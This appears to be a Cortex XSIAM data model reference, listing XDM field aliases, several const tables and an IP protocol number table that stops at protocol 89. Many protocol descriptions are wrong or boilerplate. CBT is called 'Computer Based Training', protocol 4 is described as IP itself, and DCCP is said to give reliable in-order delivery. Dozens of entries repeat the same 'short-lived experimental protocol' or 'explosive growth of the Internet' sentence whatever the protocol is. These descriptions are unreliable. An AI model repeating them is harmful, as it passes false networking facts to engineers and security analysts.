XSIAM Data Model Schema
2. XDM Aliases
2.1. XDM_ALIAS.ipv4
2.2. XDM_ALIAS.ipv6
2.3. XDM_ALIAS.ip
2.4. XDM_ALIAS.user
2.5. XDM_ALIAS.identity_type
2.6. XDM_ALIAS.file
2.7. XDM_ALIAS.file_hash
2.8. XDM_ALIAS.domain
2.9. XDM_ALIAS.hostname
2.10. XDM_ALIAS.country
2.11. XDM_ALIAS.resource
2.12. XDM_ALIAS.cloud_project
2.13. XDM_ALIAS.cloud_provider
2.14. XDM_ALIAS.cloud_zone
3. XDM Consts
3.1. XDM_CONST.EVENT_TAG
3.2. XDM_CONST.OUTCOME
3.3. XDM_CONST.PRIVILEGE_LEVEL
3.4. XDM_CONST.USER_TYPE
3.5. XDM_CONST.IP_PROTOCOL
3.6. XDM_CONST.CLOUD_PROVIDER
3.7. XDM_CONST.OS_FAMILY
3.8. XDM_CONST.AGENT_TYPE
3.9. XDM_CONST.SIGNATURE_STATUS
3.10. XDM_CONST.REGISTRY_VALUE_TYPE
3.11. XDM_CONST.HTTP_METHOD
3.12. XDM_CONST.HTTP_RSP_CODE
3.13. XDM_CONST.DHCP_MESSAGE_TYPE
3.14. XDM_CONST.DCERPC_OPERATION
3.15. XDM_CONST.KERBEROS_MSG_TYPE
3.16. XDM_CONST.KERBEROS_PRINCIPAL_TYPE
3.17. XDM_CONST.KERBEROS_KDC_OPTION
3.18. XDM_CONST.KERBEROS_ENCRYPTION_TYPE
3.19. XDM_CONST.KERBEROS_PA_TYPE
3.20. XDM_CONST.KERBEROS_ERROR_CODE
3.21. XDM_CONST.LDAP_OPERATION
3.22. XDM_CONST.LDAP_SCOPE
3.23. XDM_CONST.LDAP_BIND_AUTH_TYPE
3.24. XDM_CONST.LOGON_TYPE
3.25. XDM_CONST.LOGON_IMPERSONATION_LEVEL
3.26. XDM_CONST.LOGON_ASSIGNED_RIGHT
3.27. XDM_CONST.DB_OPERATION
3.28. XDM_CONST.MITRE_TACTIC
3.29. XDM_CONST.MITRE_TECHNIQUE
3.30. XDM_CONST.THREAT_CATEGORY
3.31. XDM_CONST.URL_CATEGORY
3.32. XDM_CONST.DNS_RESPONSE_CODE
3.33. XDM_CONST.DNS_RECORD_TYPE
3.34. XDM_CONST.OPERATION_TYPE
3.35. XDM_CONST.IDENTITY_TYPE
3.36. XDM_CONST.SCOPE_TYPE
3.37. XDM_CONST.LOG_LEVEL
4. XDM Fieldsets
4.1. fieldset.xdm_core
4.2. fieldset.xdm_cloud
4.3. fieldset.xdm_endpoint
4.4. fieldset.xdm_identity
4.5. fieldset.xdm_network
5. XDM Fields
5.1. xdm.session_context_id
5.2. xdm.event
5.3. xdm.source
5.4. xdm.intermediate
5.5. xdm.target
5.6. xdm.observer
5.7. xdm.alert
5.8. xdm.network
5.9. xdm.auth
5.10. xdm.logon
5.11. xdm.database
5.12. xdm.email
6.2. _time
6.3. _vendor
6.4. _product
6.5. _reception_time
1 | Introduction
Cortex XSIAM enables you to map your logs into a single, unified data model. This data model provides a consolidated schema and a simpler way to interact with your data, regardless of its source or dataset. This reference describes the Cortex Data Model (XDM) fields, consts, fieldsets, and aliases.
2 | XDM Aliases
2.1 | XDM_ALIAS.ipv4
Alias of the following fields:
• xdm.source.ipv4
• xdm.target.ipv4
• xdm.intermediate.ipv4
• xdm.source.host.ipv4_addresses
• xdm.target.host.ipv4_addresses
• xdm.intermediate.host.ipv4_addresses
• xdm.network.dhcp.ciaddr
• xdm.network.dhcp.yiaddr
• xdm.network.dhcp.siaddr
• xdm.network.dhcp.giaddr
• xdm.network.vpn.allocated_ipv4
2.2 | XDM_ALIAS.ipv6
Alias of the following fields:
• xdm.source.ipv6
• xdm.target.ipv6
• xdm.intermediate.ipv6
• xdm.source.host.ipv6_addresses
• xdm.target.host.ipv6_addresses
• xdm.intermediate.host.ipv6_addresses
• xdm.network.vpn.allocated_ipv6
2.3 | XDM_ALIAS.ip
Alias of the following fields:
• xdm.source.ipv4
• xdm.target.ipv4
• xdm.intermediate.ipv4
• xdm.source.host.ipv4_addresses
• xdm.target.host.ipv4_addresses
• xdm.intermediate.host.ipv4_addresses
• xdm.network.dhcp.ciaddr
• xdm.network.dhcp.yiaddr
• xdm.network.dhcp.siaddr
• xdm.network.dhcp.giaddr
• xdm.network.vpn.allocated_ipv4
• xdm.source.ipv6
• xdm.target.ipv6
• xdm.intermediate.ipv6
• xdm.source.host.ipv6_addresses
• xdm.target.host.ipv6_addresses
• xdm.intermediate.host.ipv6_addresses
• xdm.network.vpn.allocated_ipv6
2.4 | XDM_ALIAS.user
Alias of the following fields:
• xdm.source.user.username
• xdm.target.user.username
• xdm.intermediate.user.username
• xdm.auth.ntlm.user_name
• xdm.source.user.identifier
• xdm.target.user.identifier
• xdm.intermediate.user.identifier
• xdm.source.user.first_name
• xdm.target.user.first_name
• xdm.intermediate.user.first_name
• xdm.source.user.last_name
• xdm.target.user.last_name
• xdm.intermediate.user.last_name
• xdm.source.user.middle_name
• xdm.target.user.middle_name
• xdm.intermediate.user.middle_name
2.5 | XDM_ALIAS.identity_type
Alias of the following fields:
• xdm.source.user.identity_type
• xdm.target.user.identity_type
• xdm.intermediate.user.identity_type
2.6 | XDM_ALIAS.file
Alias of the following fields:
• xdm.source.process.executable.filename
• xdm.source.process.executable.path
• xdm.source.process.executable.directory
• xdm.source.process.executable.extension
• xdm.source.process.executable.file_type
• xdm.target.process.executable.filename
• xdm.target.process.executable.path
• xdm.target.process.executable.directory
• xdm.target.process.executable.extension
• xdm.target.process.executable.file_type
• xdm.intermediate.process.executable.filename
• xdm.intermediate.process.executable.path
• xdm.intermediate.process.executable.directory
• xdm.intermediate.process.executable.extension
• xdm.intermediate.process.executable.file_type
• xdm.target.module.filename
• xdm.target.module.path
• xdm.target.module.directory
• xdm.target.module.extension
• xdm.target.module.file_type
• xdm.target.file.filename
• xdm.target.file.path
• xdm.target.file.directory
• xdm.target.file.extension
• xdm.target.file.file_type
• xdm.target.file_before.filename
• xdm.target.file_before.path
• xdm.target.file_before.directory
• xdm.target.file_before.extension
• xdm.target.file_before.file_type
• xdm.email.attachment.filename
• xdm.email.attachment.path
• xdm.email.attachment.directory
• xdm.email.attachment.extension
• xdm.email.attachment.file_type
2.7 | XDM_ALIAS.file_hash
Alias of the following fields:
• xdm.source.process.executable.md5
• xdm.source.process.executable.sha256
• xdm.target.process.executable.md5
• xdm.target.process.executable.sha256
• xdm.intermediate.process.executable.md5
• xdm.intermediate.process.executable.sha256
• xdm.target.module.md5
• xdm.target.module.sha256
• xdm.target.file.md5
• xdm.target.file.sha256
• xdm.target.file_before.md5
• xdm.target.file_before.sha256
• xdm.email.attachment.md5
• xdm.email.attachment.sha256
2.8 | XDM_ALIAS.domain
Alias of the following fields:
• xdm.target.domain
• xdm.network.http.domain
• xdm.network.dns.dns_question.name
• xdm.network.dns.dns_resource_record.name
• xdm.source.user.domain
• xdm.target.user.domain
• xdm.intermediate.user.domain
• xdm.auth.ntlm.dns_domain
• xdm.auth.ntlm.domain
2.9 | XDM_ALIAS.hostname
Alias of the following fields:
• xdm.source.host.hostname
• xdm.target.host.hostname
• xdm.intermediate.host.hostname
• xdm.auth.ntlm.hostname
• xdm.auth.ntlm.dns_hostname
• xdm.network.dhcp.client_hostname
2.10 | XDM_ALIAS.country
Alias of the following fields:
• xdm.source.location.country
• xdm.target.location.country
• xdm.intermediate.location.country
2.11 | XDM_ALIAS.resource
Alias of the following fields:
• xdm.target.resource.name
• xdm.target.resource.id
• xdm.target.resource_before.name
• xdm.target.resource_before.id
2.12 | XDM_ALIAS.cloud_project
Alias of the following fields:
• xdm.source.cloud.project
• xdm.target.cloud.project
• xdm.intermediate.cloud.project
2.13 | XDM_ALIAS.cloud_provider
Alias of the following fields:
• xdm.source.cloud.provider
• xdm.target.cloud.provider
• xdm.intermediate.cloud.provider
2.14 | XDM_ALIAS.cloud_zone
Alias of the following fields:
• xdm.source.cloud.zone
• xdm.target.cloud.zone
• xdm.intermediate.cloud.zone
3 | XDM Consts
3.1 | XDM_CONST.EVENT_TAG
List of tags that are related to the activity.
Original | Mapped
AUTHENTICATION | XDM_CONST.EVENT_TAG_AUTHENTICATION
NETWORK | XDM_CONST.EVENT_TAG_NETWORK
CLOUD | XDM_CONST.EVENT_TAG_CLOUD
SAAS | XDM_CONST.EVENT_TAG_SAAS
ONPREM | XDM_CONST.EVENT_TAG_ONPREM
VPN | XDM_CONST.EVENT_TAG_VPN
3.2 | XDM_CONST.OUTCOME
A result of an activity.
Original | Mapped | Description
SUCCESS | XDM_CONST.OUTCOME_SUCCESS | The activity completed successfully. For example, a file was successfully transferred from one location to another.
FAILED | XDM_CONST.OUTCOME_FAILED | The activity did not complete successfully. For example, an attempt to delete a file failed because it was being used by another process.
PARTIAL | XDM_CONST.OUTCOME_PARTIAL | The activity completed with partial success. For example, a batch of records was imported into a database, but some of the records were invalid and could not be imported.
UNKNOWN | XDM_CONST.OUTCOME_UNKNOWN | The outcome of the activity is unknown, or the outcome has not been determined yet.
3.3 | XDM_CONST.PRIVILEGE_LEVEL
A canonical privilege level.
Original | Mapped | Description
SYSTEM | XDM_CONST.PRIVILEGE_LEVEL_SYSTEM | A user account with the highest level of privileges, often reserved for operating-system processes.
3.4 | XDM_CONST.USER_TYPE
The user type.
Original | Mapped | Description
SERVICE_ACCOUNT | XDM_CONST.USER_TYPE_SERVICE_ACCOUNT | A user account for a service or application, typically used to perform automated tasks or to access resources.
MACHINE_ACCOUNT | XDM_CONST.USER_TYPE_MACHINE_ACCOUNT | A user account for a machine or device, typically used to authenticate and manage access to resources.
3.5 | XDM_CONST.IP_PROTOCOL
The transport-layer protocol (layer 4 in the OSI model) identified by the protocol number in the IP header; also known as the IP Protocol. See https://www.iana.org/assignments/protocol-numbers/protocol-numbers.xhtml.
0 XDM_CONST.IP_PROTOCOL_HOPOPT IPv6 Hop-by-Hop Option is an optional header used to carry optional information that must be examined by every node along a packet's delivery path.
1 XDM_CONST.IP_PROTOCOL_ICMP The Internet Control Message Protocol (ICMP) is a protocol used to send error messages and operational information between network devices. It is an integral part of the Internet Protocol (IP) and is used to report errors and provide other information
about the status of the IP network.
2 XDM_CONST.IP_PROTOCOL_IGMP The Internet Group Management Protocol (IGMP) is a protocol used by IP hosts to report their multicast group membership to multicast routers. It is used to establish multicast group memberships and facilitate the delivery of multicast traffic to the
appropriate hosts.
3 XDM_CONST.IP_PROTOCOL_GGP The Gateway-to-Gateway Protocol (GGP) was a routing protocol used in the early days of the Internet. It was designed to exchange routing information between gateways (now called routers) and was used to build the first Internet routing table.
4 XDM_CONST.IP_PROTOCOL_IP The Internet Protocol (IP) is the primary protocol used for communication on the Internet. It is responsible for routing packets between devices on the network and ensuring that they are delivered to the correct destination.
5 XDM_CONST.IP_PROTOCOL_ST The ST Protocol (also known as the ST Datagram Mode Protocol) was a short-lived experimental protocol developed in the early days of the Internet. It was designed to allow devices to send datagrams (packets) to each other without establishing a
connection first.
6 XDM_CONST.IP_PROTOCOL_TCP The Transmission Control Protocol (TCP) is a transport layer protocol used to establish and maintain connections between devices on a network. It is a reliable, connection-oriented protocol that ensures that data is delivered to the correct destination
in the correct order.
Original Mapped Description
7 XDM_CONST.IP_PROTOCOL_CBT The CBT (Computer Based Training) Protocol was a short-lived experimental protocol developed in the early days of the Internet. It was designed to allow devices to send datagrams (packets) to each other in a way that would allow them to be used for
computer-based training applications.
8 XDM_CONST.IP_PROTOCOL_EGP The Exterior Gateway Protocol (EGP) was a routing protocol used in the early days of the Internet. It was designed to exchange routing information between autonomous systems (networks under a common administrative domain) and was used to
build the first Internet routing table.
9 XDM_CONST.IP_PROTOCOL_IGP An Interior Gateway Protocol (IGP) is a routing protocol used to exchange routing information within an autonomous system (a network under a common administrative domain). Examples of IGPs include OSPF, EIGRP, and IS-IS.
10 XDM_CONST.IP_PROTOCOL_BBN_RCC_MON The BBN RCC Monitoring Protocol was a short-lived experimental protocol developed by BBN Technologies in the early days of the Internet. It was designed to allow devices to send datagrams (packets) to each other in a way that would allow them to
be used for monitoring and measurement purposes.
11 XDM_CONST.IP_PROTOCOL_NVP_II The NVP-II (Network Voice Protocol) was an early experimental protocol developed by Xerox PARC for voice communication over the Internet. It was designed to allow devices to send voice data over the Internet using datagrams (packets).
12 XDM_CONST.IP_PROTOCOL_PUP The PUP (PARC Universal Packet) Protocol was a short-lived experimental protocol developed by Xerox PARC in the early days of the Internet. It was designed to allow devices to send datagrams (packets) to each other in a way that would allow them
to be used for a wide variety of applications.
13 XDM_CONST.IP_PROTOCOL_ARGUS The ARGUS Protocol was a short-lived experimental protocol developed in the early days of the Internet. It was designed to allow devices to send datagrams (packets) to each other in a way that would allow them to be used for monitoring and
measurement purposes.
14 XDM_CONST.IP_PROTOCOL_EMCON The EMCON (Emission Control) Protocol was a short-lived experimental protocol developed in the early days of the Internet. It was designed to allow devices to send datagrams (packets) to each other in a way that would allow them to be used for
monitoring and measurement purposes.
15 XDM_CONST.IP_PROTOCOL_XNET The XNET Protocol was a short-lived experimental protocol developed in the early days of the Internet. It was designed to allow devices to send datagrams (packets) to each other in a way that would allow them to be used for monitoring and
measurement purposes.
16 XDM_CONST.IP_PROTOCOL_CHAOS The CHAOS Protocol was a short-lived experimental protocol developed in the early days of the Internet. It was designed to allow devices to send datagrams (packets) to each other in a way that would allow them to be used for monitoring and
measurement purposes.
17 XDM_CONST.IP_PROTOCOL_UDP The User Datagram Protocol (UDP) is a transport layer protocol used to send datagrams (packets) over a network. It is a connectionless protocol, which means that it does not establish a connection before sending data and does not guarantee that
data will be delivered to the destination.
18 XDM_CONST.IP_PROTOCOL_MUX The MUX Protocol was a short-lived experimental protocol developed in the early days of the Internet. It was designed to allow devices to send datagrams (packets) to each other in a way that would allow them to be used for multiplexing (combining
multiple signals into one) purposes.
19 XDM_CONST.IP_PROTOCOL_DCN_MEAS The DCN Measurement Protocol was a short-lived experimental protocol developed in the early days of the Internet. It was designed to allow devices to send datagrams (packets) to each other in a way that would allow them to be used for monitoring
and measurement purposes.
20 XDM_CONST.IP_PROTOCOL_HMP The Host Monitoring Protocol (HMP) was a short-lived experimental protocol developed in the early days of the Internet. It was designed to allow devices to send datagrams (packets) to each other in a way that would allow them to be used for
monitoring and measurement purposes.
21 XDM_CONST.IP_PROTOCOL_PRM The Packet Radio Measurement Protocol (PRM) was a short-lived experimental protocol developed in the early days of the Internet. It was designed to allow devices to send datagrams (packets) to each other in a way that would allow them to be used
for monitoring and measurement purposes.
22 XDM_CONST.IP_PROTOCOL_XNS_IDP The Xerox Network System (XNS) Internet Datagram Protocol (IDP) was an early experimental protocol developed by Xerox PARC for communication on the Internet. It was designed to allow devices to send datagrams (packets) to each other over the
Internet.
23 XDM_CONST.IP_PROTOCOL_TRUNK_1 The TRUNK-1 Protocol was a short-lived experimental protocol developed in the early days of the Internet. It was designed to allow devices to send datagrams (packets) to each other in a way that would allow them to be used for trunking (combining
multiple signals into one) purposes.
24 XDM_CONST.IP_PROTOCOL_TRUNK_2 The TRUNK-2 Protocol was a short-lived experimental protocol developed in the early days of the Internet. It was designed to allow devices to send datagrams (packets) to each other in a way that would allow them to be used for trunking (combining
multiple signals into one) purposes.
25 XDM_CONST.IP_PROTOCOL_LEAF_1 The LEAF-1 Protocol was a short-lived experimental protocol developed in the early days of the Internet. It was designed to allow devices to send datagrams (packets) to each other in a way that would allow them to be used for leafing (combining
multiple signals into one) purposes.
26 XDM_CONST.IP_PROTOCOL_LEAF_2 The LEAF-2 Protocol was a short-lived experimental protocol developed in the early days of the Internet. It was designed to allow devices to send datagrams (packets) to each other in a way that would allow them to be used for leafing (combining
multiple signals into one) purposes.
27 XDM_CONST.IP_PROTOCOL_RDP The Reliable Data Protocol (RDP) was a short-lived experimental protocol developed in the early days of the Internet. It was designed to provide reliable, in-order delivery of datagrams (packets) over an unreliable network.
28 XDM_CONST.IP_PROTOCOL_IRTP The Internet Reliable Transaction Protocol (IRTP) was a short-lived experimental protocol developed in the early days of the Internet. It was designed to provide reliable, in-order delivery of datagrams (packets) over an unreliable network.
29 XDM_CONST.IP_PROTOCOL_ISO_TP4 The ISO Transport Protocol Class 4 (ISO TP4) was an early experimental protocol developed by the International Organization for Standardization (ISO) for communication on the Internet. It was designed to allow devices to send datagrams (packets)
to each other over the Internet.
30 XDM_CONST.IP_PROTOCOL_NETBLT The Network Block Transfer Protocol (NETBLT) was a short-lived experimental protocol developed in the early days of the Internet. It was designed to allow devices to send large blocks of data to each other over the Internet.
31 XDM_CONST.IP_PROTOCOL_MFE_NSP The MFE Network Services Protocol (MFE-NSP) was a short-lived experimental protocol developed in the early days of the Internet. It was designed to allow devices to send datagrams (packets) to each other in a way that would allow them to be used
for monitoring and measurement purposes.
32 XDM_CONST.IP_PROTOCOL_MERIT_INP The MERIT Internodal Protocol (MERIT-INP) was a short-lived experimental protocol developed in the early days of the Internet. It was designed to allow devices to send datagrams (packets) to each other in a way that would allow them to be used for
monitoring and measurement purposes.
33 XDM_CONST.IP_PROTOCOL_DCCP The Datagram Congestion Control Protocol (DCCP) is a transport layer protocol used to send datagrams (packets) over a network. It is a connectionless protocol that provides reliable, in-order delivery of datagrams while also allowing for congestion
control.
34 XDM_CONST.IP_PROTOCOL_3PC The Third Party Connect Protocol (3PC) was a short-lived experimental protocol developed in the early days of the Internet. It was designed to allow devices to send datagrams (packets) to each other in a way that would allow them to be used for
monitoring and measurement purposes.
35 XDM_CONST.IP_PROTOCOL_IDPR The Inter-Domain Policy Routing Protocol (IDPR) was a short-lived experimental protocol developed in the early days of the Internet. It was designed to allow devices to send datagrams (packets) to each other in a way that would allow them to be used
for routing purposes between different domains (networks).
36 XDM_CONST.IP_PROTOCOL_XTP The Xpress Transfer Protocol (XTP) was a short-lived experimental protocol developed in the early days of the Internet. It was designed to allow devices to send datagrams (packets) to each other in a way that would allow them to be used for high-
speed data transfer.
37 XDM_CONST.IP_PROTOCOL_DDP The Datagram Delivery Protocol (DDP) was a short-lived experimental protocol developed in the early days of the Internet. It was designed to allow devices to send datagrams (packets) to each other in a way that would allow them to be used for
routing purposes between different domains (networks).
38 XDM_CONST.IP_PROTOCOL_IDPR_CMTP The Inter-Domain Policy Routing Control Message Transport Protocol (IDPR-CMTP) was a short-lived experimental protocol developed in the early days of the Internet. It was designed to allow devices to send datagrams (packets) to each other in a
way that would allow them to be used for routing control purposes between different domains (networks).
Original Mapped Description
39 XDM_CONST.IP_PROTOCOL_TP The TP Protocol was a short-lived experimental protocol developed in the early days of the Internet. It was designed to allow devices to send datagrams (packets) to each other in a way that would allow them to be used for routing purposes between
different domains (networks).
40 XDM_CONST.IP_PROTOCOL_IL The IL Protocol was a short-lived experimental protocol developed in the early days of the Internet. It was designed to allow devices to send datagrams (packets) to each other in a way that would allow them to be used for routing purposes between
different domains (networks).
41 XDM_CONST.IP_PROTOCOL_IPV6 Internet Protocol version 6 (IPv6) is the latest version of the Internet Protocol (IP), the communication protocol that provides an identification and location system for computers on networks and routes traffic across the Internet. It was designed to
replace the older IPv4, which had become inadequate due to the explosive growth of the Internet.
42 XDM_CONST.IP_PROTOCOL_SDRP The Source Demand Routing Protocol (SDRP) was a short-lived experimental protocol developed in the early days of the Internet. It was designed to allow devices to send datagrams (packets) to each other in a way that would allow them to be used
for routing purposes between different domains (networks).
43 XDM_CONST.IP_PROTOCOL_IPV6_ROUTE The IPv6 Routing Protocol (IPv6-Route) is a protocol used for routing Internet Protocol version 6 (IPv6) packets between different domains (networks). It was designed to replace the older IPv4 routing protocols, which had become inadequate due to
the explosive growth of the Internet.
44 XDM_CONST.IP_PROTOCOL_IPV6_FRAG The IPv6 Fragmentation Protocol (IPv6-Frag) is a protocol used for fragmenting Internet Protocol version 6 (IPv6) packets into smaller pieces for transmission over networks that have a smaller maximum packet size. It was designed to replace the
older IPv4 fragmentation protocols, which had become inadequate due to the explosive growth of the Internet.
45 XDM_CONST.IP_PROTOCOL_IDRP The Inter-Domain Routing Protocol (IDRP) was a short-lived experimental protocol developed in the early days of the Internet. It was designed to allow devices to send datagrams (packets) to each other in a way that would allow them to be used for
routing purposes between different domains (networks).
46 XDM_CONST.IP_PROTOCOL_RSVP The Resource ReSerVation Protocol (RSVP) is a protocol used for reserving resources in a network for real-time applications. It was designed to allow devices to send datagrams (packets) to each other in a way that would allow them to request and
reserve resources such as bandwidth, buffer space, and processing power.
47 XDM_CONST.IP_PROTOCOL_GRE The Generic Routing Encapsulation (GRE) Protocol is a tunneling protocol used to carry other protocols over an Internet Protocol (IP) network. It was designed to allow devices to send datagrams (packets) to each other in a way that would allow them
to be encapsulated (wrapped) in a GRE header for transmission over an IP network.
48 XDM_CONST.IP_PROTOCOL_DSR The Dynamic Source Routing Protocol (DSR) is a routing protocol used for ad hoc mobile networks. It was designed to allow devices to send datagrams (packets) to each other in a way that would allow them to dynamically discover and maintain
routes to their destination without the need for a central routing server.
49 XDM_CONST.IP_PROTOCOL_BNA The BNA Protocol was a short-lived experimental protocol developed in the early days of the Internet. It was designed to allow devices to send datagrams (packets) to each other in a way that would allow them to be used for networking purposes.
50 XDM_CONST.IP_PROTOCOL_ESP The Encapsulating Security Payload (ESP) Protocol is a security protocol used to provide confidentiality, integrity, and authenticity to Internet Protocol (IP) packets. It was designed to allow devices to send datagrams (packets) to each other in a way
that would allow them to be encrypted and authenticated for secure transmission over an IP network.
51 XDM_CONST.IP_PROTOCOL_AH The Authentication Header (AH) Protocol is a security protocol used to provide authenticity and integrity to Internet Protocol (IP) packets. It was designed to allow devices to send datagrams (packets) to each other in a way that would allow them to be
authenticated for secure transmission over an IP network.
52 XDM_CONST.IP_PROTOCOL_I_NLSP The Integrated Net Layer Security Protocol (I-NLSP) was a short-lived experimental protocol developed in the early days of the Internet. It was designed to allow devices to send datagrams (packets) to each other in a way that would allow them to be
used for networking purposes.
53 XDM_CONST.IP_PROTOCOL_SWIPE The Simple Internet Protocol for Emerging Networks (SWIPE) was a short-lived experimental protocol developed in the early days of the Internet. It was designed to allow devices to send datagrams (packets) to each other in a way that would allow
them to be used for networking purposes.
54 XDM_CONST.IP_PROTOCOL_NARP The NBMA Address Resolution Protocol (NARP) was a short-lived experimental protocol developed in the early days of the Internet. It was designed to allow devices to send datagrams (packets) to each other in a way that would allow them to be used
for networking purposes.
55 XDM_CONST.IP_PROTOCOL_MOBILE The Mobile IP Protocol is a protocol used for routing Internet Protocol (IP) packets between devices that are connected to a mobile network. It was designed to allow devices to send datagrams (packets) to each other in a way that would allow them to
remain connected and reachable while on the move.
56 XDM_CONST.IP_PROTOCOL_TLSP The Transport Layer Security Protocol (TLSP) was a short-lived experimental protocol developed in the early days of the Internet. It was designed to allow devices to send datagrams (packets) to each other in a way that would allow them to be used
for networking purposes.
57 XDM_CONST.IP_PROTOCOL_SKIP The Simple Key-Management for Internet Protocols (SKIP) Protocol was a short-lived experimental protocol developed in the early days of the Internet. It was designed to allow devices to send datagrams (packets) to each other in a way that would
allow them to be used for networking purposes.
58 XDM_CONST.IP_PROTOCOL_IPV6_ICMP The Internet Protocol version 6 (IPv6) Internet Control Message Protocol (ICMP) is a protocol used for error reporting, congestion control, and informational messages in IPv6 networks. It was designed to replace the older IPv4 ICMP protocol, which
had become inadequate due to the explosive growth of the Internet.
59 XDM_CONST.IP_PROTOCOL_IPV6_NONXT The IPv6 No Next Header (IPv6-Nonxt) Protocol is a protocol used to indicate the end of a list of extension headers in an Internet Protocol version 6 (IPv6) packet. It was designed to replace the older IPv4 protocol, which had become inadequate due
to the explosive growth of the Internet.
60 XDM_CONST.IP_PROTOCOL_IPV6_OPTS The IPv6 Options (IPv6-Opts) Protocol is a protocol used to carry optional information in an Internet Protocol version 6 (IPv6) packet. It was designed to replace the older IPv4 options protocol, which had become inadequate due to the explosive growth
of the Internet.
62 XDM_CONST.IP_PROTOCOL_CFTP The CFTP Protocol was a short-lived experimental protocol developed in the early days of the Internet. It was designed to allow devices to send datagrams (packets) to each other in a way that would allow them to be used for file transfer purposes.
64 XDM_CONST.IP_PROTOCOL_SAT_EXPAK The SATNET and Backroom EXPAK Protocol was a short-lived experimental protocol developed in the early days of the Internet. It was designed to allow devices to send datagrams (packets) to each other in a way that would allow them to be used for
networking purposes.
65 XDM_CONST.IP_PROTOCOL_KRYPTOLAN The KRYPTOLAN Protocol was a short-lived experimental protocol developed in the early days of the Internet. It was designed to allow devices to send datagrams (packets) to each other in a way that would allow them to be used for networking
purposes.
66 XDM_CONST.IP_PROTOCOL_RVD The MIT Remote Virtual Disk Protocol (RVD) was a short-lived experimental protocol developed in the early days of the Internet. It was designed to allow devices to send datagrams (packets) to each other in a way that would allow them to be used for
networking purposes.
67 XDM_CONST.IP_PROTOCOL_IPPC The Internet Pluribus Packet Core Protocol (IPPC) was a short-lived experimental protocol developed in the early days of the Internet. It was designed to allow devices to send datagrams (packets) to each other in a way that would allow them to be
used for networking purposes.
69 XDM_CONST.IP_PROTOCOL_SAT_MON The SATNET Monitoring Protocol was a short-lived experimental protocol developed in the early days of the Internet. It was designed to allow devices to send datagrams (packets) to each other in a way that would allow them to be used for networking
purposes.
70 XDM_CONST.IP_PROTOCOL_VISA The VISA Protocol was a short-lived experimental protocol developed in the early days of the Internet. It was designed to allow devices to send datagrams (packets) to each other in a way that would allow them to be used for networking purposes.
71 XDM_CONST.IP_PROTOCOL_IPCV The Internet Packet Core Utility Protocol (IPCV) was a short-lived experimental protocol developed in the early days of the Internet. It was designed to allow devices to send datagrams (packets) to each other in a way that would allow them to be used
for networking purposes.
72 XDM_CONST.IP_PROTOCOL_CPNX The Computer Protocol Network Executive Protocol (CPNX) was a short-lived experimental protocol developed in the early days of the Internet. It was designed to allow devices to send datagrams (packets) to each other in a way that would allow them
to be used for networking purposes.
73 XDM_CONST.IP_PROTOCOL_CPHB The Computer Protocol Heartbeat Protocol (CPHB) was a short-lived experimental protocol developed in the early days of the Internet. It was designed to allow devices to send datagrams (packets) to each other in a way that would allow them to be
used for networking purposes.
Original Mapped Description
74 XDM_CONST.IP_PROTOCOL_WSN The WANG Span Network Protocol (WSN) was a short-lived experimental protocol developed in the early days of the Internet. It was designed to allow devices to send datagrams (packets) to each other in a way that would allow them to be used for networking purposes.
75 XDM_CONST.IP_PROTOCOL_PVP The Packet Video Protocol (PVP) was a short-lived experimental protocol developed in the early days of the Internet. It was designed to allow devices to send datagrams (packets) to each other in a way that would allow them to be used for video streaming purposes.
76 XDM_CONST.IP_PROTOCOL_BR_SAT_MON The Backroom SATNET Monitoring Protocol was a short-lived experimental protocol developed in the early days of the Internet. It was designed to allow devices to send datagrams (packets) to each other in a way that would allow them to be used for networking purposes.
77 XDM_CONST.IP_PROTOCOL_SUN_ND The SUN ND Protocol was a short-lived experimental protocol developed in the early days of the Internet. It was designed to allow devices to send datagrams (packets) to each other in a way that would allow them to be used for networking purposes.
78 XDM_CONST.IP_PROTOCOL_WB_MON The WIDEBAND Monitoring Protocol was a short-lived experimental protocol developed in the early days of the Internet. It was designed to allow devices to send datagrams (packets) to each other in a way that would allow them to be used for networking purposes.
79 XDM_CONST.IP_PROTOCOL_WB_EXPAK The WIDEBAND EXPAK Protocol was a short-lived experimental protocol developed in the early days of the Internet. It was designed to allow devices to send datagrams (packets) to each other in a way that would allow them to be used for networking purposes.
80 XDM_CONST.IP_PROTOCOL_ISO_IP The International Standards Organization Internet Protocol (ISO-IP) is a protocol used for error reporting, congestion control, and informational messages in international networks. It was designed to be compatible with the older IPv4 protocol, which had become inadequate due to the explosive growth of the Internet.
81 XDM_CONST.IP_PROTOCOL_VMTP The Versatile Message Transaction Protocol (VMTP) is a protocol used to send messages between computers in a distributed system. It was designed to be more reliable and efficient than the older IPv4 protocol, which had become inadequate due to the explosive growth of the Internet.
82 XDM_CONST.IP_PROTOCOL_SECURE_VMTP The Secure VMTP Protocol is a protocol used to send secure messages between computers in a distributed system. It was designed to be more reliable and efficient than the older IPv4 protocol, which had become inadequate due to the explosive growth of the Internet.
83 XDM_CONST.IP_PROTOCOL_VINES The VINES Protocol is a protocol used to send messages between computers in a distributed system. It was developed by Banyan Systems, Inc. and was designed to be more reliable and efficient than the older IPv4 protocol, which had become inadequate due to the explosive growth of the Internet.
84 XDM_CONST.IP_PROTOCOL_TTP The TTP Protocol is a protocol used to send messages between computers in a distributed system. It was developed by Xerox Corporation and was designed to be more reliable and efficient than the older IPv4 protocol, which had become inadequate due to the explosive growth of the Internet.
85 XDM_CONST.IP_PROTOCOL_NSFNET_IGP The NSFNET Interior Gateway Protocol (NSFNET-IGP) is a protocol used to send messages between computers in a distributed system. It was developed by the National Science Foundation (NSF) and was designed to be more reliable and efficient than the older IPv4 protocol, which had become inadequate due to the explosive growth of the Internet.
86 XDM_CONST.IP_PROTOCOL_DGP The Dissimilar Gateway Protocol (DGP) is a protocol used to send messages between computers in a distributed system. It was designed to be more reliable and efficient than the older IPv4 protocol, which had become inadequate due to the explosive growth of the Internet.
87 XDM_CONST.IP_PROTOCOL_TCF The TCF Protocol is a protocol used to send messages between computers in a distributed system. It was developed by the Trusted Information Systems (TIS) company and was designed to be more reliable and efficient than the older IPv4 protocol, which had become inadequate due to the explosive growth of the Internet.
88 XDM_CONST.IP_PROTOCOL_EIGRP The Enhanced Interior Gateway Routing Protocol (EIGRP) is a routing protocol used to send messages between computers in a distributed system. It was developed by Cisco Systems and was designed to be more reliable and efficient than the older IPv4 protocol, which had become inadequate due to the explosive growth of the Internet.
89 XDM_CONST.IP_PROTOCOL_OSPFIGP The Open Shortest Path First Interior Gateway Protocol (OSPF IGP) is a routing protocol used to send messages between computers in a distributed system. It was developed by the OSPF Working Group and was designed to be more reliable and efficient than the older IPv4 protocol, which had become inadequate due to the explosive growth of the Internet.
